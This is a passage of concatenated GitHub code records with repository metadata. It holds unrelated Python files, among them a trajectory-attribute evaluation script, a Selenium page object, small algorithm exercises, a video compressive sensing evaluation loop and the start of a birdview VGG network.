self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n v = d / (0.1 * self._cfg['skip'])\n vs.append(v.std())\n vs = pd.DataFrame(np.array(vs), index=self._index, columns=['velocity_std'])\n self._caculate_result = vs if self._caculate_result is None \\\n else pd.concat([self._caculate_result, vs], axis=1)\n return vs\n\n def distance_mean(self):\n \"\"\"Caculate distance mean\n \"\"\"\n print(\"===== starting calculate distance mean =====\")\n dm = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n dm.append(d.mean())\n dm = pd.DataFrame(np.array(dm), index=self._index, columns=['distance_mean'])\n self._caculate_result = dm if self._caculate_result is None else \\\n pd.concat([self._caculate_result, dm], axis=1)\n return dm\n\n def distance_std(self):\n \"\"\"Caculate distance std\n \"\"\"\n print(\"===== starting calculate velocity std =====\")\n ds = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n ds.append(d.std())\n ds = pd.DataFrame(np.array(ds), index=self._index, columns=['distance_std'])\n self._caculate_result = ds if self._caculate_result is None else \\\n pd.concat([self._caculate_result, ds], axis=1)\n return ds\n\n def direction(self):\n \"\"\"Caculate direction\n \"\"\"\n print(\"===== starting calculate direction =====\")\n directions = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n vector = np.array([x[1:] - x[:-1], y[1:] - y[:-1]]).T\n base = np.array([x[-1] - x[0], y[-1] - y[0]])\n angle = self.caculate_angle_relative(base, vector)\n dangle = angle[1:] - angle[:-1]\n\n isleft = False\n left_sum_angle = 0.\n left_idx = np.where(dangle < -self._cfg['direction_monotonic_point_deg'])[0]\n if len(left_idx) > 0:\n left_idx, _ = substring(left_idx)\n left_num = np.array([len(item) for item in left_idx])\n max_idx = np.argmax(left_num)\n max_num = left_num[max_idx]\n left_sum_angle = abs(dangle[left_idx[max_idx][0]:left_idx[max_idx][-1] + 1].sum())\n isleft = True if max_num >= self._cfg['direction_monotonic_point_num'] else False\n\n isright = False\n right_sum_angle = 0.\n right_idx = np.where(dangle > self._cfg['direction_monotonic_point_deg'])[0]\n if len(right_idx) > 0:\n right_idx, _ = substring(right_idx)\n right_num = np.array([len(item) for item in right_idx])\n max_idx = np.argmax(right_num)\n max_num = right_num[max_idx]\n right_sum_angle = \\\n abs(dangle[right_idx[max_idx][0]:right_idx[max_idx][-1] + 1].sum())\n isright = True if max_num >= self._cfg['direction_monotonic_point_num'] else False\n\n d_threshold = self._cfg['direction_dist'] * (len(each_gt_data) / (self._cfg['seq'] * 2))\n if (x.max() - x.min()) < d_threshold and (y.max() - y.min()) < d_threshold:\n direction = 'static'\n elif isleft and left_sum_angle > self._cfg['direction_deg']:\n direction = 'left'\n elif isright and right_sum_angle > self._cfg['direction_deg']:\n direction = 'right'\n else:\n direction = 'straight'\n directions.append(direction)\n directions = pd.DataFrame(directions, index=self._index, columns=['directions'])\n self._caculate_result = directions if self._caculate_result is None else pd.concat(\n [self._caculate_result, directions], axis=1)\n return directions\n\n def shake(self):\n \"\"\"Caculate shake data here\n \"\"\"\n print(\"===== starting calculate shake =====\")\n shakes = []\n ds = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n xy = np.array([[[x[i], y[i]], [x[i + 1], y[i + 1]], [x[i + 2], y[i + 2]]]\n for i in range(len(x) - 2)])\n a = np.sqrt(((xy[:, 0, :] - xy[:, 1, :]) ** 2).sum(1))\n b = np.sqrt(((xy[:, 1, :] - xy[:, 2, :]) ** 2).sum(1))\n c = np.sqrt(((xy[:, 2, :] - xy[:, 0, :]) ** 2).sum(1))\n p = (a + b + c) / 2\n s = np.sqrt(p * (p - a) * (p - b) * (p - c))\n d = 2 * s / b\n d[np.isnan(d)] = -1\n d = d.max()\n ds.append(d)\n if d < self._cfg['shake_d']:\n shake = 'smooth'\n else:\n shake = 'jitter'\n shakes.append(shake)\n shakes = pd.DataFrame(shakes, index=self._index, columns=['shakes'])\n self._caculate_result = shakes if self._caculate_result is None else pd.concat(\n [self._caculate_result, shakes], axis=1)\n return shakes\n\n def crowd(self):\n \"\"\"Caculate crowd data here\n \"\"\"\n crowds = []\n origin_dict = self._orign_single_dict\n new_dict = defaultdict(lambda: [])\n for idx, _ in origin_dict.items():\n folder, actor, _, start_fid = idx.split('_')[:4]\n new_dict[folder + '_' + actor + '_' + start_fid].append(idx)\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n crowd = 0\n idx = self._index[i]\n folder, actor, pid, _ = idx.split('_')[:4]\n pred_fid = int(each_result_data[2])\n this_data = np.array(origin_dict\n [folder + '_' + actor + '_' + pid + '_' + str(pred_fid)]\n [:2]).astype(np.float32)\n for around_idx in new_dict[folder + '_' + actor + '_' + str(pred_fid)]:\n around_pid = around_idx.split('_')[2]\n if int(around_pid) == int(pid):\n continue\n around_data = np.array(origin_dict[around_idx][:2]).astype(np.float32)\n dist = np.sqrt(((this_data - around_data) ** 2).sum())\n if dist < self._cfg['crowd_dist']:\n crowd += 1\n crowds.append(crowd)\n crowds = pd.DataFrame(crowds, index=self._index, columns=['crowds'])\n self._caculate_result = crowds if self._caculate_result is None else pd.concat(\n [self._caculate_result, crowds], axis=1)\n return crowds\n\n @staticmethod\n def caculate_distance(x, y):\n \"\"\"Caculate distance in trace\n \"\"\"\n vector = np.array([x[1:] - x[:-1], y[1:] - y[:-1]]).T\n distance = np.sqrt((vector ** 2).sum(1))\n return distance\n\n @staticmethod\n def caculate_angle_relative(base, vector):\n \"\"\"caculate relative angles between base and vector\n\n Args:\n base: A numpy array with shape (2,)\n vector: A numpy array with shape (n,2)\n\n Returns:\n A numpy array with shape(n,)\n \"\"\"\n\n def caculate_angley(vector):\n # vector np(n,2) 与y轴夹角0-360\n base = np.array([0., 1.])\n numerator = np.sum(vector * base, 1)\n denominator = np.sqrt(np.sum(base ** 2)) * np.sqrt(np.sum(vector ** 2, 1))\n denominator = np.clip(denominator, 1e-10, np.inf)\n cos = numerator / denominator\n angle = np.arccos(cos) * 180 / np.pi\n angle = np.clip(angle, 0., 180.)\n angle[vector[:, 0] < 0] = 360. - angle[vector[:, 0] < 0]\n return angle\n\n vector = np.concatenate([base.reshape(1, 2), vector], 0)\n angley = caculate_angley(vector)\n angle = (angley - angley[0])[1:] # -360~360\n angle[angle > 180.] = angle[angle > 180.] - 360\n angle[angle < -180.] = angle[angle < -180.] + 360 # -180~180\n return angle\n\n def concate_trace_result(self, data, is_result=False):\n \"\"\"Concate data with self._caculate_result\n\n return:\n new: A DataFrame recording caculate result\n caculate_size: A int recording numbers of result\n \"\"\"\n new = pd.concat([data, self._caculate_result], axis=1)\n if is_result:\n self._caculate_result = new\n caculate_size = data.shape[1]\n return new, caculate_size\n\n def get_data(self):\n return self._result_data\n\n def get_xy_data(self):\n return self._result_xy_data\n\n def get_result_data(self):\n return self._caculate_result\n\n def get_index_data(self):\n return self._index\n\n def select_discrete_attr(self, index_data, name, attr):\n index = (index_data.ix[:, name] == attr)\n return index\n\n def select_continuous_attr(self, index_data, name, min_, max_):\n index = (index_data.ix[:, name] >= min_) & (index_data.ix[:, name] <= max_)\n return index\n\n def paint_direction(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None):\n attr = ['static', 'left', 'right', 'straight']\n save_path_pie = os.path.join(save_path, 'directions_pie.png')\n self.paint_discrete_pie('directions', attr, figsize, save_path_pie)\n save_path_bl = os.path.join(save_path, 'directions_broken_line.png')\n self.paint_discrete_trace(eva, 'directions', attr, save_path_bl, eval_save_path)\n\n def paint_shake(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None):\n attr = ['smooth', 'jitter']\n save_path_pie = os.path.join(save_path, 'shakes_pie.png')\n self.paint_discrete_pie('shakes', attr, figsize, save_path_pie)\n save_path_bl = os.path.join(save_path, 'shakes_broken_line.png')\n self.paint_discrete_trace(eva, 'shakes', attr, save_path_bl, eval_save_path)\n\n def paint_crowd(self, eva, eval_save_path,\n figsize=(30, 20), save_path=None, interval=5, interval_part=None,\n max_=1.):\n save_path_pie = os.path.join(save_path, 'crowd_pie.png')\n self.paint_continuous_pie('crowds', figsize, save_path_pie,\n interval, interval_part, max_)\n save_path_bl = os.path.join(save_path, 'crow_broken_line.png')\n self.paint_continuous_trace(eva, 'crowds', save_path_bl,\n eval_save_path, interval=interval)\n\n def paint_velocity_mean(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None, interval=5, interval_part=None,\n max_=1.):\n save_path_pie = os.path.join(save_path, 'velocity_mean_pie.png')\n self.paint_continuous_pie('velocity_mean', figsize, save_path_pie,\n interval, interval_part, max_)\n save_path_bl = os.path.join(save_path, 'velocity_mean_broken_line.png')\n self.paint_continuous_trace(eva, 'velocity_mean', save_path_bl, eval_save_path, interval=5)\n\n def paint_velocity_std(self, eva, eval_save_path, figsize=(30, 20),\n save_path=None, interval=5, interval_part=None,\n max_=1.):\n save_path_pie = os.path.join(save_path, 'velocity_std_pie.png')\n self.paint_continuous_pie('velocity_std', figsize, save_path_pie,\n interval, interval_part, max_)\n save_path_bl = os.path.join(save_path, 'velocity_std_broken_line.png')\n self.paint_continuous_trace(eva, 'velocity_std', save_path_bl, eval_save_path, interval=5)\n\n def paint_discrete_pie(self, name, attr, figsize=(5, 5), save_path=None, data=None):\n if data is None:\n data = self._caculate_result[name].values\n else:\n data = data[name].values\n plt.figure(figsize=figsize)\n\n count = []\n for type_ in attr:\n count.append((data == type_).sum())\n count = np.array(count)\n percent = 100. * count / count.sum()\n plt.subplot(1, 1, 1)\n patches, _ = plt.pie(count, shadow=False, startangle=90)\n labels = ['{0} {1:1.2f}%'.format(i, j) for i, j in zip(attr, percent)]\n plt.axis('equal')\n plt.legend(patches, labels, loc='center right', fontsize=30)\n if name != 'crowd':\n plt.title(name, fontsize='xx-large')\n else:\n pass\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n def paint_continuous_pie(self, name, figsize=(20, 20), save_path=None,\n interval=30, interval_part=None, max_partial=1.,\n data=None):\n if data is None:\n data = self._caculate_result[name].values\n else:\n data = data[name].values\n plt.figure(figsize=figsize)\n data_ = np.linspace(data.min(), data.max(), interval + 1)\n count = []\n for i in range(interval):\n min_, max_ = data_[i], data_[i + 1]\n num = ((data >= min_) & (data <= max_)).sum()\n count.append(num)\n count = np.array(count)\n percent = 100. * count / count.sum()\n if interval_part is None:\n plt.subplot(1, 1, 1)\n else:\n plt.subplot(1, 2, 1)\n patches, _ = plt.pie(count, shadow=False, startangle=90)\n labels = ['{0:1.2f}~{1:1.2f} {2:1.3f}%'.format(data_[i],\n data_[i + 1], percent[i])\n for i in range(interval)]\n plt.axis('equal')\n plt.legend(patches, labels, loc='center left', fontsize=30)\n plt.title(name + ' (m/s)', fontsize=30)\n\n if interval_part is not None:\n data_ = np.linspace(data.min(), max_partial, interval_part + 1)\n count = []\n for i in range(interval_part):\n min_, max_ = data_[i], data_[i + 1]\n num = ((data >= min_) & (data <= max_)).sum()\n count.append(num)\n count = np.array(count)\n percent = 100. * count / count.sum()\n\n plt.subplot(1, 2, 2)\n patches, _ = plt.pie(count, shadow=False, startangle=90)\n labels = ['{0:1.2f}~{1:1.2f} m/s {2:1.3f}%'.format(data_[i],\n data_[i + 1], percent[i]) for i in\n range(interval_part)]\n plt.axis('equal')\n plt.legend(patches, labels, loc='center right', fontsize=30)\n plt.title(name + '_partial (m/s)', fontsize=30)\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n def paint_discrete_trace(self, eva, name, attr, save_path,\n eval_save_path, figsize=(30, 20), data=None, xy_data=None):\n if data is None and xy_data is None:\n data, data_num = self.concate_trace_result(self._result_data)\n data_xy, data_xy_num = self.concate_trace_result(self._result_xy_data)\n else:\n data, data_num = self.concate_trace_result(data)\n data_xy, data_xy_num = self.concate_trace_result(xy_data)\n plt.figure(figsize=figsize)\n\n mse_list = []\n mse_only_list = []\n for type_ in attr:\n print(\"====== evaluating \", str(type_), \" mse =====\")\n with open(eval_save_path, 'a') as f:\n f.write(\"====== evaluating \" + str(type_) + \" mse =====\\n\")\n this_attr_data = data.ix[(data[name] == type_), :]\n\n if len(this_attr_data.values) == 0:\n attr.remove(type_)\n continue\n this_data = this_attr_data.ix[:, :data_num]\n this_xy_attr_data = data_xy.ix[(data_xy[name] == type_), :]\n this_xy_data = this_xy_attr_data.ix[:, :data_xy_num]\n mse, mse_only = eva.eval(self._origin_xy_data, this_xy_data,\n this_data, eval_save_path, self._cfg['skip'])\n mse_list.append(mse)\n mse_only_list.append(mse_only)\n mse_list = np.array(mse_list)\n mse_only_list = np.array(mse_only_list)\n for i in range(0, mse_list.shape[1]):\n x_axis = [i for i in range(0, len(attr))]\n y_axis = mse_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_\" + str(self._frame_list[i]))\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=40)\n y_axis = mse_only_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_only_\" + str(self._frame_list[i]))\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=40)\n index = attr\n plt.xticks(x_axis, index, fontsize=40)\n plt.title(name + '_mse', fontsize=40)\n plt.yticks(fontsize=40)\n plt.legend(loc='best', fontsize=40)\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n def paint_continuous_trace(self, eva, name, save_path,\n eval_save_path, interval=5,\n figsize=(30, 20), data=None, xy_data=None):\n if data is None and xy_data is None:\n data, data_num = self.concate_trace_result(self._result_data)\n data_xy, data_xy_num = self.concate_trace_result(self._result_xy_data)\n else:\n data, data_num = self.concate_trace_result(data)\n data_xy, data_xy_num = self.concate_trace_result(xy_data)\n plt.figure(figsize=figsize)\n res = data[name].values\n data_ = np.linspace(res.min(), res.max(), interval + 1)\n mse_list = []\n mse_only_list = []\n index = []\n\n for i in range(interval):\n print(\"====== evaluating \", name, \" \", str(i), \" mse =====\")\n with open(eval_save_path, 'a') as f:\n f.write(\"====== evaluating \" + name + \" \" + str(i) + \" mse =====\\n\")\n min_, max_ = data_[i], data_[i + 1]\n index.append(str(round(min_, 2)) + '~' + str(round(max_, 2)))\n this_attr_data = data.ix[(data[name] >= min_) & (data[name] <= max_), :]\n if this_attr_data is None:\n continue\n this_data = this_attr_data.ix[:, :data_num]\n this_xy_attr_data = data_xy.ix[(data_xy[name] >= min_) & (data_xy[name] <= max_), :]\n this_xy_data = this_xy_attr_data.ix[:, :data_xy_num]\n mse, mse_only = eva.eval(self._origin_xy_data,\n this_xy_data, this_data, eval_save_path, self._cfg['skip'])\n mse_list.append(mse)\n mse_only_list.append(mse_only)\n mse_list = np.array(mse_list)\n mse_only_list = np.array(mse_only_list)\n\n for i in range(0, mse_list.shape[1]):\n x_axis = [i for i in range(interval)]\n y_axis = mse_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_\" + str(self._frame_list[i]))\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=20)\n y_axis = mse_only_list[:, i]\n plt.plot(x_axis, y_axis, label=\"mse_only_\" + str(self._frame_list[i]))\n plt.xticks(x_axis, index, fontsize=40)\n for a, b in zip(x_axis, y_axis):\n plt.text(a, b, round(b, 3), ha='center', va='bottom', fontsize=20)\n plt.title(name + '_mse', fontsize=40)\n plt.legend(loc='best', fontsize=40)\n plt.yticks(fontsize=40)\n if save_path is not None:\n plt.gcf().savefig(save_path, bbox_inches='tight')\n # plt.show()\n\n\nif __name__ == '__main__':\n class Config():\n config_ped = {\n 'direction_monotonic_point_deg': 0.2,\n 'direction_monotonic_point_num': 5,\n 'direction_dist': 0.5,\n 'direction_deg': 5,\n 'shake_d': 3.0, # 3\n 'skip': 5,\n 'seq': 10,\n 'crowd_dist': 5\n }\n\n @click.command()\n @click.option('--origin_path', default=\"../../data/origin_tc/test_selected\",\n help=\"A string recording origin path\")\n @click.option('--result_path', default=\"../../data/result_tc/test_selected/result_skip5\",\n help=\"A string recording result path\")\n @click.option('--eval_path', default=\"./eval.txt\",\n help=\"A string recording eval txt path\")\n @click.option('--paint_save_path', default=\"../../data/paint/model_1\",\n help=\"A string recording image saved path\")\n @click.option('--actor', default=\"ped\",\n help=\"A string recording actor to evaluate\")\n @click.option('--is_eval_all', default=True, type=str,\n help=\"all attr to eval\")\n @click.option('--is_group_attr', default=False, help=\"if make group attr\")\n def start(origin_path, result_path, eval_path,\n paint_save_path, actor, is_eval_all, is_group_attr):\n attr_name = ['velocity_mean', 'shake']\n origin = DataLoader()\n origin.variable_operate(origin_path, os.path.join(origin_path, 'test.txt'), actor)\n origin_data = origin.variable_get_data()\n origin_xy_data = origin.variable_get_data_with_window(2, each_len=2, stride=12)\n orign_single_dict = origin.variable_convert_data_to_dict(origin_data, stride=12)\n pred = DataLoader()\n pred.operate(result_path, os.path.join(result_path, \"data_out.txt\"), actor)\n pred_data = pred.get_data()\n pred_xy_data = pred.get_data_with_window(4, 2)\n config = getattr(Config, 'config_ped')\n frame_list = [4, 10]\n eva = Evaluation(frame_list)\n eval_save_path = eval_path\n image_save_path = paint_save_path\n with open(eval_save_path, 'a') as f:\n f.write(\"skip is %d\\n\" % config['skip'])\n attr = Attributes(origin_data, origin_xy_data,\n pred_data, pred_xy_data, config, orign_single_dict, frame_list)\n if is_eval_all:\n attr.operate()\n attr.paint_operate(eva, eval_save_path, save_path=image_save_path)\n else:\n for type_ in attr_name:\n getattr(attr, type_)()\n getattr(attr, \"paint_\" + type_)(eva, eval_save_path, save_path=image_save_path)\n\n if is_group_attr:\n # smooth & v <= 3\n result_data = attr.get_result_data()\n\n index1 = attr.select_continuous_attr(result_data, 'velocity_mean', 0, 3)\n index2 = attr.select_discrete_attr(result_data, 'shakes', 'smooth')\n index = (index1 & index2)\n index = index.to_frame()\n index.columns = [\"un_normal\"]\n attr.concate_trace_result(index, is_result=True)\n attr_type = [True, False]\n save_path_pie = os.path.join(paint_save_path, 'un_normal_pie.png')\n attr.paint_discrete_pie(\"un_normal\", attr_type, save_path=save_path_pie)\n save_path_pie = os.path.join(paint_save_path, 'un_normal_trace.png')\n attr.paint_discrete_trace(eva, \"un_normal\",\n attr_type, save_path=save_path_pie, eval_save_path=eval_save_path)\n\n # pylint: disable=no-value-for-parameter\n start()\n","repo_name":"EdSimp/visual_eval","sub_path":"Attributes.py","file_name":"Attributes.py","file_ext":"py","file_size_in_byte":30911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31185777143","text":"from selenium.webdriver.common.by import By\n\n\nclass SearchCustomer:\n txt_email_id = (By.ID, \"SearchEmail\")\n txt_firstname_id = (By.ID, \"SearchFirstName\")\n txt_lastname_id = (By.ID, \"SearchLastName\")\n btn_search_xpath = (By.XPATH, \"//button[@id='search-customers']\")\n table_searchresults_xpath = (By.XPATH, \"//div[@class='dataTables_scrollHead']\")\n table_xpath = (By.XPATH, \"//table[@id='customers-grid']\")\n table_rows_xpath = (By.XPATH, \"//table[@id='customers-grid']//tbody/tr\")\n table_columns_xpath = (By.XPATH, \"//table[@id='customers-grid']//tbody/tr/td\")\n\n def __init__(self, driver):\n self.driver = driver\n\n def setEmail(self, Email):\n self.driver.find_element(*self.txt_email_id).clear()\n self.driver.find_element(*self.txt_email_id).send_keys(Email)\n\n def setFname(self, Fname):\n self.driver.find_element(*self.txt_firstname_id).clear()\n self.driver.find_element(*self.txt_firstname_id).send_keys(Fname)\n\n def setLname(self, Lname):\n self.driver.find_element(*self.txt_lastname_id).clear()\n self.driver.find_element(*self.txt_lastname_id).send_keys(Lname)\n\n def clickonSearch(self):\n self.driver.find_element(*self.btn_search_xpath).click()\n\n def getNoofRows(self):\n return len(self.driver.find_elements_by_xpath(self.table_rows_xpath))\n\n def getNoofColumns(self):\n return len(self.driver.find_elements_by_xpath(self.table_columns_xpath))\n\n def searchbyemail(self, email):\n flag = False\n for r in range(1, self.getNoofRows()+1):\n table = self.driver.find_element_by_xpath(self.table_xpath)\n emailid = table.find_element_by_xpath(\"//table[@id='customers-grid']/tbody/tr[\"+str(r)+\"]/td[2]\").text\n if emailid == email:\n flag = True\n break\n return flag\n\n def searchbyname(self, Name1):\n flag = False\n for r in range(1, self.getNoofRows()+1):\n table = self.driver.find_element_by_xpath(self.table_xpath)\n name = table.find_element_by_xpath(\"//table[@id='customers-grid']/tbody/tr[\"+str(r)+\"]/td[3]\")\n if name == Name1:\n flag = True\n break\n return flag\n\n\n\n\n","repo_name":"praveen3384/nopcommerceApp","sub_path":"pageObjects/SearchCustomerPage.py","file_name":"SearchCustomerPage.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25972925810","text":"'''\n공유기 사이의 거리를 가능한 범위 안에서 임의로 정하고 배치한 후, 문제에서 제시한 개수 조건이 맞는지 확인해서 맞으면 그렇게 배치한다.\n이때 임의로 정하는 과정에서 이분탐색을 사용한다.\n=> 공유기 사이의 거리는 최소 1, 최대 xN-x1이다.\n해당 범위 내에서 조건을 만족하는 거리를 탐색한다.\n'''\n\nn,c = map(int, input().split())\n\nhomeList= sorted([int(input()) for _ in range(n)])\nhomeLength = len(homeList)\n\nresult = 0\nstart = 1\nend = homeList[-1] - homeList[0]\n\n\nwhile(end >= start):\n half = (start + end)//2\n\n # 배치하기\n beforeDistance = -1\n homeCount = 0\n for home in homeList:\n if(homeCount==0 or home-beforeDistance>=half):\n homeCount+=1\n beforeDistance = home\n if homeCount>c: break\n\n if homeCount>=c:\n # c개 이상으로 배치되면 => 거리를 넓혀야 함\n result = half\n start = half+1\n elif homeCount 거리를 좁혀야 함\n end = half-1\n \nprint(result)","repo_name":"sadie100/Practice_algorithm","sub_path":"백준/답봄/gold/2110_gold4_공유기 설치.py","file_name":"2110_gold4_공유기 설치.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42625626296","text":"# coding=utf-8\r\nfrom __future__ import print_function\r\nimport os\r\n\r\nall_file = []\r\n\r\n\r\ndef get_all_file(path):\r\n all_file_list = os.listdir(path)\r\n for f in all_file_list:\r\n file_path = os.path.join(path, f)\r\n # 判断是不是文件夹\r\n if os.path.isdir(file_path):\r\n get_all_file(file_path)\r\n all_file.append(file_path)\r\n return all_file\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n src_path = \"C:\\\\he\\\\py_proj_27\\\\set_proxy\\\\code\\\\default\\\\python27\\\\1.0\\\\lib\\\\site-packages\\\\adodbapi\"\r\n allfiles = get_all_file(src_path)\r\n\r\n for item in allfiles:\r\n print(item)\r\n","repo_name":"heyongman/python3","sub_path":"portable_python/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6513629899","text":"a=int(input(\"Enter a number : \"))\ndef check(a):# Function for checking whether number is a happy number\n sum=0\n happy=False\n for i in range (101):\n while a>0:\n r=a%10\n sum=sum+(r**2)\n a=a//10\n if sum==1:\n happy=True\n break\n else:\n a=sum\n sum=0\n return happy\nif check(a)==True:\n print(\"The number is a Happy number\")\nelse:\n print(\"The number is a Sad number\")\n \n\n\ndef range_print(): # Function for printing happy numbers in the range \n l=int(input(\"Enter the first range : \"))\n u=int(input(\"Enter the final range : \"))\n for i in range(l,u+1):\n if check(i)==True:\n print(i)\nprint(\"\")\nrange_print()\n\n\ndef first_n_print(): # Function for printing first n happy numbers\n n=int(input(\"Enter the number of happy numbers needed : \"))\n count=0\n i=0\n while countb cr h w',b=1)\n Phi_s = einops.repeat(mask_s,'h w->b 1 h w',b=1)\n\n Phi = torch.from_numpy(Phi).to(args.device)\n Phi_s = torch.from_numpy(Phi_s).to(args.device)\n \n for ii in range(batch_size):\n single_meas = meas[ii].unsqueeze(0).unsqueeze(0)\n with torch.no_grad():\n outputs = model(single_meas, Phi, Phi_s)\n if not isinstance(outputs,list):\n outputs = [outputs]\n output = outputs[-1][0].cpu().numpy()\n batch_output.append(output)\n for jj in range(cr):\n if output.shape[0]==3:\n per_frame_out = output[:,jj]\n per_frame_out = np.sum(per_frame_out*test_data.rgb2raw,axis=0)\n else:\n per_frame_out = output[jj]\n per_frame_gt = gt[ii,jj, :, :]\n psnr += compare_psnr(per_frame_gt*255,per_frame_out*255)\n ssim += compare_ssim(per_frame_gt*255,per_frame_out*255)\n psnr = psnr / (batch_size * cr)\n ssim = ssim / (batch_size * cr)\n psnr_list.append(psnr)\n ssim_list.append(ssim)\n out_list.append(np.array(batch_output))\n gt_list.append(gt)\n\n test_dir = osp.join(args.work_dir,\"test_images\")\n if not osp.exists(test_dir):\n os.makedirs(test_dir)\n\n for i,name in enumerate(test_data.data_name_list):\n _name,_ = name.split(\"_\")\n psnr_dict[_name] = psnr_list[i]\n ssim_dict[_name] = ssim_list[i]\n out = out_list[i]\n gt = gt_list[i]\n for j in range(out.shape[0]):\n image_name = osp.join(test_dir,_name+\"_\"+str(j)+\".png\")\n save_image(out[j],gt[j],image_name)\n psnr_dict[\"psnr_mean\"] = np.mean(psnr_list)\n ssim_dict[\"ssim_mean\"] = np.mean(ssim_list)\n return psnr_dict,ssim_dict","repo_name":"ucaswangls/STFormer","sub_path":"cacti/utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"76"} +{"seq_id":"34081696782","text":"def sum_square(num_list):\n temp = list(num_list)\n for num in range(len(temp)):\n temp[num] = temp[num] ** 2\n return sum(temp)\n\n\ndef square_sum(num_list):\n return sum(num_list) * sum(num_list)\n\n\nif __name__ == '__main__':\n\n numbers = [i for i in range(1, 101)]\n sum_square(numbers)\n print(square_sum(numbers) - sum_square(numbers))\n","repo_name":"MarcusKJOoi/ProjectEuler","sub_path":"Problem6.py","file_name":"Problem6.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30202270239","text":"# created by Weizhi\n# birdview proposal net (3D RPN)\n# 3D proposal network\n# region fusion\nimport tensorflow as tf\nimport TensorflowUtils as utils\nimport numpy as np\nimport random\nimport pdb\n# from roi_pooling.roi_pooling_ops import roi_pooling\n\n# Vgg net modified for birdview input\ndef vgg_net_birdview(weights, image, debug, keep_prob):\n layers = (\n 'birdview_conv1_1', 'birdview_relu1_1', 'birdview_conv1_2', 'birdview_relu1_2', 'birdview_pool1',\n\n 'birdview_conv2_1', 'birdview_relu2_1', 'birdview_conv2_2', 'birdview_relu2_2', 'birdview_pool2',\n\n 'birdview_conv3_1', 'birdview_relu3_1', 'birdview_conv3_2', 'birdview_relu3_2', 'birdview_conv3_3',\n 'birdview_relu3_3', 'birdview_pool3',\n\n 'birdview_conv4_1', 'birdview_relu4_1', 'birdview_conv4_2', 'birdview_relu4_2', 'birdview_conv4_3',\n 'birdview_relu4_3'\n\n # 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n # 'relu5_3'\n )\n\n # output of retrained layer for vgg\n net = {}\n current = image\n channel = 